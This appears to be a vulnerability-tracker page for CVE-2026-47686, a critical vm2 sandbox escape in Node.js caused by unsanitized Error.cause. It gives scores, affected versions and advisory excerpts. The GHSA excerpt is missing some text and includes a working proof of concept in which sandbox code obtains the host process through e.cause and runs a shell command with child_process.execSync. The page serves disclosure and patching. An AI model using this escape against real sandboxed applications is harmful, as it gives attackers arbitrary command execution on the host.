CVE-2026-47686
published 2026-08-17CVE-2026-47686: vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, handleException() in lib/setup-sandbox.js sanitizes SuppressedError.error…
PriorityP261critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
EPSS
0.38%
31.8th percentile
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, handleException() in lib/setup-sandbox.js sanitizes SuppressedError.error, SuppressedError.suppressed, and AggregateError.errors but does not sanitize Error.cause, allowing sandbox code to obtain a powerful host object such as process from an embedder-exposed host function that throws an error with that object as its cause and then execute arbitrary host commands. This issue is fixed in version 3.11.6.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| patriksimek | vm2 | < 3.11.6 | 3.11.6 |
| vm2_project | vm2 | >= 0 < 3.11.6 | 3.11.6 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
patriksimek vm2 up to 3.11.5 Sandbox Setup lib/setup-sandbox.js handleException (WID-SEC-2026-2865)
vuldb·2026-08-17·CVSS 9.9
CVE-2026-47686 [CRITICAL] patriksimek vm2 up to 3.11.5 Sandbox Setup lib/setup-sandbox.js handleException (WID-SEC-2026-2865)
A vulnerability has been found in patriksimek vm2 up to 3.11.5 and classified as critical. This affects the function handleException of the file lib/setup-sandbox.js of the component Sandbox Setup. Performing a manipulation results in sandbox issue.
This vulnerability was named CVE-2026-47686. The attack may be initiated remotely. There is no available exploit.
The affected component should be upgraded.
GHSA
VM2 has Missing Error.cause Sanitization that Enables Sandbox Escape to RCE
ghsa·2026-08-17
CVE-2026-47686 [CRITICAL] CWE-693 VM2 has Missing Error.cause Sanitization that Enables Sandbox Escape to RCE
VM2 has Missing Error.cause Sanitization that Enables Sandbox Escape to RCE
**Affected:** vm2 {
throw new Error('fail', { cause: process });
}
}
});
const result = vm.run(`
try {
hostFn();
} catch (e) {
// .cause is not sanitized, so we get a direct reference to host process
const proc = e.cause;
proc.mainModule.require('child_process').execSync('id').toString();
}
`);
console.log(result);
```
Verified output:
```
uid=502(vladimir.tokarev) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),...
```
Full RCE confirmed.
## Impact
Any application using vm2 where an embedder-exposed function throws an Error with `.cause` referencing a host object is vulnerable. The attacker gains:
- Full host process access (read/write files, spawn processes, network access)
- Sandbox escape
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2026-08-17
Published